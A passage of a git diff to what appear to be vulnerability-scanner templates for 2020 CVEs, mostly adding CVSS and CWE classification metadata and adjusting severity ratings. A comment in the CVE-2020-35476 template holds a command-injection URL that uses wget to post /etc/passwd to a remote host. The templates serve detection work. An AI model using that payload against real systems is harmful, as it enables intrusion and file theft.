classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-25495 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-25506.yaml b/cves/2020/CVE-2020-25506.yaml index d2352c64ac..2ee12a9f60 100644 --- a/cves/2020/CVE-2020-25506.yaml +++ b/cves/2020/CVE-2020-25506.yaml @@ -9,6 +9,11 @@ info: - https://gist.github.com/WinMin/6f63fd1ae95977e0e2d49bd4b5f00675 - https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/ tags: cve,cve2020,dlink,rce,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-25506 + cwe-id: CWE-78 requests: - raw: 
diff --git a/cves/2020/CVE-2020-2551.yaml b/cves/2020/CVE-2020-2551.yaml index c861f6b44a..348fd0ba52 100644 --- a/cves/2020/CVE-2020-2551.yaml +++ b/cves/2020/CVE-2020-2551.yaml @@ -19,6 +19,10 @@ info: reference: https://github.com/hktalent/CVE-2020-2551 tags: cve,cve2020,oracle,weblogic,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-2551 requests: - method: GET diff --git a/cves/2020/CVE-2020-25540.yaml b/cves/2020/CVE-2020-25540.yaml index 822c9f5ef4..2ff12bd0ef 100644 --- a/cves/2020/CVE-2020-25540.yaml +++ b/cves/2020/CVE-2020-25540.yaml @@ -3,10 +3,15 @@ info: name: ThinkAdmin 6 - Arbitrarily File Read (CVE-2020-25540) author: geeknik - severity: medium + severity: high description: ThinkAdmin v6 is affected by a directory traversal vulnerability. An unauthorized attacker can read arbitrary files on a remote server via GET request encode parameter. reference: https://www.exploit-db.com/exploits/48812 tags: cve,cve2020,thinkadmin,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-25540 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2020/CVE-2020-26153.yaml b/cves/2020/CVE-2020-26153.yaml index fb40209d26..7a0433f16c 100644 --- a/cves/2020/CVE-2020-26153.yaml +++ b/cves/2020/CVE-2020-26153.yaml @@ -10,6 +10,11 @@ info: - https://labs.nettitude.com/blog/cve-2020-26153-event-espresso-core-cross-site-scripting/ - https://nvd.nist.gov/vuln/detail/CVE-2020-26153 tags: cve,cve2020,xss,wordpress,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-26153 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-26214.yaml b/cves/2020/CVE-2020-26214.yaml index d3d76d844b..0ebba2ba0c 100644 --- a/cves/2020/CVE-2020-26214.yaml +++ b/cves/2020/CVE-2020-26214.yaml 
@@ -11,6 +11,11 @@ info: - https://tools.ietf.org/html/rfc4513#section-5.1.2 - https://pypi.org/project/alerta-server/8.1.0/ tags: cve,cve2020,alerta + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-26214 + cwe-id: CWE-287 requests: - method: GET diff --git a/cves/2020/CVE-2020-26919.yaml b/cves/2020/CVE-2020-26919.yaml index b9efcf09b6..18174b37ea 100644 --- a/cves/2020/CVE-2020-26919.yaml +++ b/cves/2020/CVE-2020-26919.yaml @@ -9,6 +9,10 @@ info: - https://research.nccgroup.com/2021/03/08/technical-advisory-multiple-vulnerabilities-in-netgear-prosafe-plus-jgs516pe-gs116ev2-switches/ - https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/ tags: cve,cve2020,netgear,rce,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-26919 requests: - raw: diff --git a/cves/2020/CVE-2020-26948.yaml b/cves/2020/CVE-2020-26948.yaml index 54d281ece9..6367027877 100644 --- a/cves/2020/CVE-2020-26948.yaml +++ b/cves/2020/CVE-2020-26948.yaml @@ -7,6 +7,11 @@ info: reference: https://github.com/btnz-k/emby_ssrf description: Emby Server before 4.5.0 allows SSRF via the Items/RemoteSearch/Image ImageURL parameter. tags: cve,cve2020,emby,jellyfin,ssrf + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-26948 + cwe-id: CWE-918 requests: - method: GET diff --git a/cves/2020/CVE-2020-27361.yaml b/cves/2020/CVE-2020-27361.yaml index cc00677a99..800de254e4 100644 --- a/cves/2020/CVE-2020-27361.yaml +++ b/cves/2020/CVE-2020-27361.yaml 
@@ -7,6 +7,11 @@ info: description: An issue exists within Akkadian Provisioning Manager 4.50.02 which allows attackers to view sensitive information within the /pme subdirectories. reference: https://www.blacklanternsecurity.com/2021-07-01-Akkadian-CVE/ tags: cve,cve2020,akkadian,listing,exposure + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-27361 + cwe-id: CWE-668 requests: - method: GET diff --git a/cves/2020/CVE-2020-27735.yaml b/cves/2020/CVE-2020-27735.yaml index 31b0f18651..dc84ec8031 100644 --- a/cves/2020/CVE-2020-27735.yaml +++ b/cves/2020/CVE-2020-27735.yaml @@ -8,6 +8,11 @@ info: An XSS issue was discovered in Wing FTP 6.4.4. An arbitrary IFRAME element can be included in the help pages via a crafted link, leading to the execution of (sandboxed) arbitrary HTML and JavaScript in the user's browser. reference: https://nvd.nist.gov/vuln/detail/CVE-2020-27735 tags: cve,cve2020,xss,wing-ftp + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-27735 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-27866.yaml b/cves/2020/CVE-2020-27866.yaml index cc13503b5f..81151b66a4 100644 --- a/cves/2020/CVE-2020-27866.yaml +++ b/cves/2020/CVE-2020-27866.yaml @@ -11,6 +11,11 @@ info: - https://www.zerodayinitiative.com/advisories/ZDI-20-1451/ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27866 - https://kb.netgear.com/000062641/Security-Advisory-for-Password-Recovery-Vulnerabilities-on-Some-Routers + classification: + cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2020-27866 + cwe-id: CWE-288 requests: - raw: diff --git a/cves/2020/CVE-2020-27982.yaml b/cves/2020/CVE-2020-27982.yaml index 91159315d6..f46b932a44 100644 --- a/cves/2020/CVE-2020-27982.yaml +++ b/cves/2020/CVE-2020-27982.yaml 
@@ -6,6 +6,11 @@ info: description: IceWarp 11.4.5.0 allows XSS via the language parameter. reference: https://packetstormsecurity.com/files/159763/Icewarp-WebMail-11.4.5.0-Cross-Site-Scripting.html tags: cve,cve2020,xss,icewarp + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-27982 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-27986.yaml b/cves/2020/CVE-2020-27986.yaml index dcb73a8bf5..d33b9d2de3 100644 --- a/cves/2020/CVE-2020-27986.yaml +++ b/cves/2020/CVE-2020-27986.yaml @@ -3,13 +3,18 @@ id: CVE-2020-27986 info: name: SonarQube unauth author: pikpikcu - severity: medium + severity: high description: | SonarQube 8.4.2.36762 allows remote attackers to discover cleartext SMTP, SVN, and GitLab credentials via the api/settings/values URI. NOTE: reportedly, the vendor's position for SMTP and SVN is "it is the administrator's responsibility to configure it." reference: https://csl.com.co/sonarqube-auditando-al-auditor-parte-i/ tags: cve,cve2020,sonarqube + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-27986 + cwe-id: CWE-306,CWE-312 requests: - method: GET diff --git a/cves/2020/CVE-2020-28188.yaml b/cves/2020/CVE-2020-28188.yaml index e511013c53..45c1ee460a 100644 --- a/cves/2020/CVE-2020-28188.yaml +++ b/cves/2020/CVE-2020-28188.yaml @@ -10,6 +10,11 @@ info: - https://www.pentest.com.tr/exploits/TerraMaster-TOS-4-2-06-Unauthenticated-Remote-Code-Execution.html - https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/ tags: cve,cve2020,terramaster,rce,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-28188 + cwe-id: CWE-78 requests: - raw: diff --git a/cves/2020/CVE-2020-28208.yaml b/cves/2020/CVE-2020-28208.yaml index e320eb589c..135292b076 100644 --- a/cves/2020/CVE-2020-28208.yaml 
+++ b/cves/2020/CVE-2020-28208.yaml @@ -7,6 +7,11 @@ info: description: An email address enumeration vulnerability exists in the password reset function of Rocket.Chat through 3.9.1. reference: https://trovent.io/security-advisory-2010-01 tags: cve,cve2020,rockethchat + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2020-28208 + cwe-id: CWE-203 requests: - raw: diff --git a/cves/2020/CVE-2020-28871.yaml b/cves/2020/CVE-2020-28871.yaml index 4e77e68e53..d8708d874c 100644 --- a/cves/2020/CVE-2020-28871.yaml +++ b/cves/2020/CVE-2020-28871.yaml @@ -10,6 +10,11 @@ info: - https://lyhinslab.org/index.php/2020/09/12/how-the-white-box-hacking-works-authorization-bypass-and-remote-code-execution-in-monitorr-1-7-6/ - https://www.exploit-db.com/exploits/48980 tags: cve,cve2020,monitorr,rce,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-28871 + cwe-id: CWE-434 requests: - raw: diff --git a/cves/2020/CVE-2020-28976.yaml b/cves/2020/CVE-2020-28976.yaml index 3ecd474e88..a271437130 100644 --- a/cves/2020/CVE-2020-28976.yaml +++ b/cves/2020/CVE-2020-28976.yaml @@ -3,12 +3,17 @@ id: CVE-2020-28976 info: name: Wordpress Plugin Canto 1.3.0 - Blind SSRF (Unauthenticated) author: LogicalHunter - severity: high + severity: medium description: The Canto plugin 1.3.0 for WordPress contains a blind SSRF vulnerability. It allows an unauthenticated attacker to make a request to any internal and external server via /includes/lib/detail.php?subdomain=SSRF. reference: - https://www.exploit-db.com/exploits/49189 - https://nvd.nist.gov/vuln/detail/CVE-2020-28976 tags: cve,cve2020,ssrf,wordpress,wp-plugin,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2020-28976 + cwe-id: CWE-918 requests: - method: GET 
diff --git a/cves/2020/CVE-2020-29164.yaml b/cves/2020/CVE-2020-29164.yaml index 753c1c727b..9ff125238d 100644 --- a/cves/2020/CVE-2020-29164.yaml +++ b/cves/2020/CVE-2020-29164.yaml @@ -7,6 +7,11 @@ info: severity: medium tags: pacsone,xss,cve,cve2020 reference: https://gist.github.com/leommxj/0a32afeeaac960682c5b7c9ca8ed070d + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-29164 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-29227.yaml b/cves/2020/CVE-2020-29227.yaml index 469d3e038c..b22baeb363 100644 --- a/cves/2020/CVE-2020-29227.yaml +++ b/cves/2020/CVE-2020-29227.yaml @@ -3,12 +3,16 @@ id: CVE-2020-29227 info: name: Car Rental Management System 1.0 - Local File Inclusion (LFI) author: daffainfo - severity: high + severity: critical description: An issue was discovered in Car Rental Management System 1.0. An unauthenticated user can perform a file inclusion attack against the /index.php file with a partial filename in the "page" parameter, to cause local file inclusion resulting in code execution. reference: - https://loopspell.medium.com/cve-2020-29227-unauthenticated-local-file-inclusion-7d3bd2c5c6a5 - https://nvd.nist.gov/vuln/detail/CVE-2020-29227 tags: cve,cve2020,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-29227 requests: - method: GET diff --git a/cves/2020/CVE-2020-29395.yaml b/cves/2020/CVE-2020-29395.yaml index 1072df2e03..ca81ff5115 100644 --- a/cves/2020/CVE-2020-29395.yaml +++ b/cves/2020/CVE-2020-29395.yaml @@ -9,6 +9,11 @@ info: - https://github.com/mustgundogdu/Research/tree/main/EventON_PLUGIN_XSS - https://nvd.nist.gov/vuln/detail/CVE-2020-29395 tags: cve,cve2020,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-29395 + cwe-id: CWE-79 requests: - method: GET 
diff --git a/cves/2020/CVE-2020-29453.yaml b/cves/2020/CVE-2020-29453.yaml index 3e39b3447e..447eb86dbf 100644 --- a/cves/2020/CVE-2020-29453.yaml +++ b/cves/2020/CVE-2020-29453.yaml @@ -7,6 +7,11 @@ info: description: The CachingResourceDownloadRewriteRule class in Jira Server and Jira Data Center allowed unauthenticated remote attackers to read arbitrary files within WEB-INF and META-INF directories via an incorrect path access check. reference: https://jira.atlassian.com/browse/JRASERVER-72014 tags: cve,cve2020,atlassian,jira,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2020-29453 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2020/CVE-2020-3187.yaml b/cves/2020/CVE-2020-3187.yaml index 346ae735d7..10db5b0e82 100644 --- a/cves/2020/CVE-2020-3187.yaml +++ b/cves/2020/CVE-2020-3187.yaml @@ -3,13 +3,18 @@ id: CVE-2020-3187 info: name: CVE-2020-3187 author: KareemSe1im - severity: high + severity: critical description: A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and obtain read and delete access to sensitive files on a targeted system. reference: - https://twitter.com/aboul3la/status/1286809567989575685 - http://packetstormsecurity.com/files/158648/Cisco-Adaptive-Security-Appliance-Software-9.7-Arbitrary-File-Deletion.html - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-path-JE3azWw43 tags: cve,cve2020,cisco + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N + cvss-score: 9.10 + cve-id: CVE-2020-3187 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2020/CVE-2020-3452.yaml b/cves/2020/CVE-2020-3452.yaml index 1a5f9d3e7f..5ffc08cf18 100644 --- a/cves/2020/CVE-2020-3452.yaml +++ b/cves/2020/CVE-2020-3452.yaml 
@@ -3,7 +3,7 @@ id: CVE-2020-3452 info: name: CVE-2020-3452 author: pdteam - severity: medium + severity: high description: | A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system. The vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files. reference: @@ -14,6 +14,11 @@ info: - http://packetstormsecurity.com/files/160497/Cisco-ASA-9.14.1.10-FTD-6.6.0.1-Path-Traversal.html - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86 tags: cve,cve2020,cisco,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-3452 + cwe-id: CWE-20 requests: - method: GET diff --git a/cves/2020/CVE-2020-35338.yaml b/cves/2020/CVE-2020-35338.yaml index 2470e2c195..205fad22a0 100644 --- a/cves/2020/CVE-2020-35338.yaml +++ b/cves/2020/CVE-2020-35338.yaml @@ -10,6 +10,11 @@ info: - https://jeyaseelans.medium.com/cve-2020-35338-9e841f48defa tags: cve,cve2020,wmt,default-login + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-35338 + cwe-id: CWE-798 requests: - method: GET path: 
diff --git a/cves/2020/CVE-2020-35476.yaml b/cves/2020/CVE-2020-35476.yaml index a73f95890b..a84417bce6 100644 --- a/cves/2020/CVE-2020-35476.yaml +++ b/cves/2020/CVE-2020-35476.yaml @@ -10,6 +10,11 @@ info: # Extracting /etc/passwd to remote host:- # /q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system(%27wget%20--post-file%20/etc/passwd%20http://my-host%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-35476 + cwe-id: CWE-78 requests: - method: GET diff --git a/cves/2020/CVE-2020-35489.yaml b/cves/2020/CVE-2020-35489.yaml index bac1875c05..e183ae1ea7 100644 --- a/cves/2020/CVE-2020-35489.yaml +++ b/cves/2020/CVE-2020-35489.yaml @@ -7,6 +7,11 @@ info: description: The contact-form-7 (aka Contact Form 7) plugin before 5.3.2 for WordPress allows Unrestricted File Upload and remote code execution because a filename may contain special characters. reference: https://nvd.nist.gov/vuln/detail/CVE-2020-35489 tags: cve,cve2020,wordpress,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.00 + cve-id: CVE-2020-35489 + cwe-id: CWE-434 requests: - method: GET diff --git a/cves/2020/CVE-2020-35580.yaml b/cves/2020/CVE-2020-35580.yaml index c5fa22a091..1f23d2e4e6 100644 --- a/cves/2020/CVE-2020-35580.yaml +++ b/cves/2020/CVE-2020-35580.yaml 
@@ -7,6 +7,11 @@ info: description: Local File Inclusion vulnerability in the FileServlet in all SearchBlox before 9.2.2 allows remote, unauthenticated users to read arbitrary files from the operating system via a /searchblox/servlet/FileServlet?col=url= request. Additionally, this may be used to read the contents of the SearchBlox configuration file (e.g., searchblox/WEB-INF/config.xml), which contains both the Super Admin API key and the base64 encoded SHA1 password hashes of other SearchBlox users. reference: https://hateshape.github.io/general/2021/05/11/CVE-2020-35580.html tags: cve,cve2020,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-35580 + cwe-id: CWE-522 requests: - method: GET diff --git a/cves/2020/CVE-2020-35598.yaml b/cves/2020/CVE-2020-35598.yaml index fe1febddde..435cffabbd 100644 --- a/cves/2020/CVE-2020-35598.yaml +++ b/cves/2020/CVE-2020-35598.yaml @@ -9,6 +9,11 @@ info: - https://www.exploit-db.com/exploits/49343 - https://www.cvedetails.com/cve/CVE-2020-35598 tags: cve,cve2020,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-35598 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2020/CVE-2020-35713.yaml b/cves/2020/CVE-2020-35713.yaml index a5e9540ba2..fd466fe1a3 100644 --- a/cves/2020/CVE-2020-35713.yaml +++ b/cves/2020/CVE-2020-35713.yaml @@ -7,6 +7,11 @@ info: reference: https://resolverblog.blogspot.com/2020/07/linksys-re6500-unauthenticated-rce-full.html description: Belkin LINKSYS RE6500 devices before 1.0.012.001 allow remote attackers to execute arbitrary commands or set a new password via shell metacharacters to the goform/setSysAdm page. tags: cve,cve2020,linksys,rce,oob,router + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-35713 + cwe-id: CWE-78 requests: - raw: 
diff --git a/cves/2020/CVE-2020-35729.yaml b/cves/2020/CVE-2020-35729.yaml index f0af5aa3ab..632c7a5aad 100644 --- a/cves/2020/CVE-2020-35729.yaml +++ b/cves/2020/CVE-2020-35729.yaml @@ -19,6 +19,11 @@ info: Originated from Metasploit module, copyright (c) space-r7. tags: cve,cve2020,klog,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-35729 + cwe-id: CWE-78 requests: - method: POST diff --git a/cves/2020/CVE-2020-35736.yaml b/cves/2020/CVE-2020-35736.yaml index c2bfce5c8b..377a1e0aa0 100644 --- a/cves/2020/CVE-2020-35736.yaml +++ b/cves/2020/CVE-2020-35736.yaml @@ -9,6 +9,11 @@ info: - https://github.com/liftoff/GateOne/issues/747 - https://nvd.nist.gov/vuln/detail/CVE-2020-35736 tags: cve,cve2020,gateone,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-35736 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2020/CVE-2020-35774.yaml b/cves/2020/CVE-2020-35774.yaml index e772c16eec..072b62d728 100644 --- a/cves/2020/CVE-2020-35774.yaml +++ b/cves/2020/CVE-2020-35774.yaml @@ -8,6 +8,11 @@ info: server/handler/HistogramQueryHandler.scala in Twitter TwitterServer (aka twitter-server) before 20.12.0, in some configurations, allows XSS via the /histograms endpoint. reference: https://nvd.nist.gov/vuln/detail/CVE-2020-35774 tags: cve,cve2020,xss,twitter-server + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-35774 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-3580.yaml b/cves/2020/CVE-2020-3580.yaml index af6da1dcfa..8b32f9ef9f 100644 --- a/cves/2020/CVE-2020-3580.yaml +++ b/cves/2020/CVE-2020-3580.yaml 
@@ -10,6 +10,11 @@ info: description: | Multiple vulnerabilities in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the web services interface of an affected device. The vulnerabilities are due to insufficient validation of user-supplied input by the web services interface of an affected device. An attacker could exploit these vulnerabilities by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or allow the attacker to access sensitive, browser-based information. Note: These vulnerabilities affect only specific AnyConnect and WebVPN configurations. For more information, see the Vulnerable Products section. tags: cve,cve2020,xss,cisco + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-3580 + cwe-id: CWE-79 requests: - raw: diff --git a/cves/2020/CVE-2020-35846.yaml b/cves/2020/CVE-2020-35846.yaml index 35f6119a3c..2cb08ab7d4 100644 --- a/cves/2020/CVE-2020-35846.yaml +++ b/cves/2020/CVE-2020-35846.yaml @@ -9,6 +9,11 @@ info: The $eq operator matches documents where the value of a field equals the specified value. reference: https://swarm.ptsecurity.com/rce-cockpit-cms/ tags: cve,cve2020,nosqli,sqli + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-35846 + cwe-id: CWE-89 requests: - method: POST diff --git a/cves/2020/CVE-2020-35847.yaml b/cves/2020/CVE-2020-35847.yaml index 2226a19d6f..9d33adc30f 100644 --- a/cves/2020/CVE-2020-35847.yaml +++ b/cves/2020/CVE-2020-35847.yaml 
@@ -9,6 +9,11 @@ info: which is responsible for changing the user password using the reset token. reference: https://swarm.ptsecurity.com/rce-cockpit-cms/ tags: cve,cve2020,nosqli,sqli + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-35847 + cwe-id: CWE-89 requests: - method: POST diff --git a/cves/2020/CVE-2020-35848.yaml b/cves/2020/CVE-2020-35848.yaml index 9e693b11c7..3b1a7d649a 100644 --- a/cves/2020/CVE-2020-35848.yaml +++ b/cves/2020/CVE-2020-35848.yaml @@ -9,6 +9,11 @@ info: which is responsible for displaying the user password reset form. reference: https://swarm.ptsecurity.com/rce-cockpit-cms/ tags: cve,cve2020,nosqli,sqli + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-35848 + cwe-id: CWE-89 requests: - method: POST diff --git a/cves/2020/CVE-2020-35951.yaml b/cves/2020/CVE-2020-35951.yaml index 835ccc29ed..0ab49a2bc9 100644 --- a/cves/2020/CVE-2020-35951.yaml +++ b/cves/2020/CVE-2020-35951.yaml @@ -8,6 +8,11 @@ info: An issue was discovered in the Quiz and Survey Master plugin before 7.0.1 for WordPress. It allows users to delete arbitrary files such as wp-config.php file, which could effectively take a site offline and allow an attacker to reinstall with a WordPress instance under their control. This occurred via qsm_remove_file_fd_question, which allowed unauthenticated deletions (even though it was only intended for a person to delete their own quiz-answer files). reference: https://www.wordfence.com/blog/2020/08/critical-vulnerabilities-patched-in-quiz-and-survey-master-plugin/ tags: cve,cve2020,wordpress,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:H + cvss-score: 9.90 + cve-id: CVE-2020-35951 + cwe-id: CWE-306 requests: - raw: diff --git a/cves/2020/CVE-2020-36112.yaml b/cves/2020/CVE-2020-36112.yaml index def510535d..474b9b212a 100644 --- a/cves/2020/CVE-2020-36112.yaml 
+++ b/cves/2020/CVE-2020-36112.yaml @@ -9,6 +9,11 @@ info: - https://www.tenable.com/cve/CVE-2020-36112 severity: critical tags: cve,cve2020,sqli,cse + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-36112 + cwe-id: CWE-89 requests: - raw: diff --git a/cves/2020/CVE-2020-36289.yaml b/cves/2020/CVE-2020-36289.yaml index 9b1cb65ed5..134c4160f8 100644 --- a/cves/2020/CVE-2020-36289.yaml +++ b/cves/2020/CVE-2020-36289.yaml @@ -9,6 +9,11 @@ info: reference: - https://twitter.com/ptswarm/status/1402644004781633540 - https://nvd.nist.gov/vuln/detail/CVE-2020-36289 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2020-36289 + cwe-id: CWE-200 requests: - method: GET diff --git a/cves/2020/CVE-2020-4463.yaml b/cves/2020/CVE-2020-4463.yaml index cff4fd841a..96e904d323 100644 --- a/cves/2020/CVE-2020-4463.yaml +++ b/cves/2020/CVE-2020-4463.yaml @@ -14,6 +14,11 @@ info: - https://www.ibm.com/support/pages/security-bulletin-ibm-maximo-asset-management-vulnerable-information-disclosure-cve-2020-4463 - https://github.com/Ibonok/CVE-2020-4463 tags: cve,cve2020,ibm,xxe + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L + cvss-score: 8.20 + cve-id: CVE-2020-4463 + cwe-id: CWE-611 requests: - method: POST diff --git a/cves/2020/CVE-2020-5284.yaml b/cves/2020/CVE-2020-5284.yaml index 90ae483682..97a56c996e 100644 --- a/cves/2020/CVE-2020-5284.yaml +++ b/cves/2020/CVE-2020-5284.yaml @@ -9,6 +9,11 @@ info: reference: https://github.com/zeit/next.js/releases/tag/v9.3.2 https://github.com/zeit/next.js/security/advisories/GHSA-fq77-7p7r-83rj + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N + cvss-score: 4.30 + cve-id: CVE-2020-5284 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2020/CVE-2020-5307.yaml b/cves/2020/CVE-2020-5307.yaml index 6107fbb57a..160406214c 100644 
